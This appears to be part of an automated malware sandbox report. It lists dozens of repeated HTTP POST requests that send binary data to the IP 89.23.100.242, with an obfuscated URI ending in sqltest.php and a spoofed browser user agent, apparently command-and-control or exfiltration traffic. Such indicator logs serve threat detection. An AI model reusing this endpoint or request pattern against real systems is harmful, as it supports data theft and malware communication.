                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
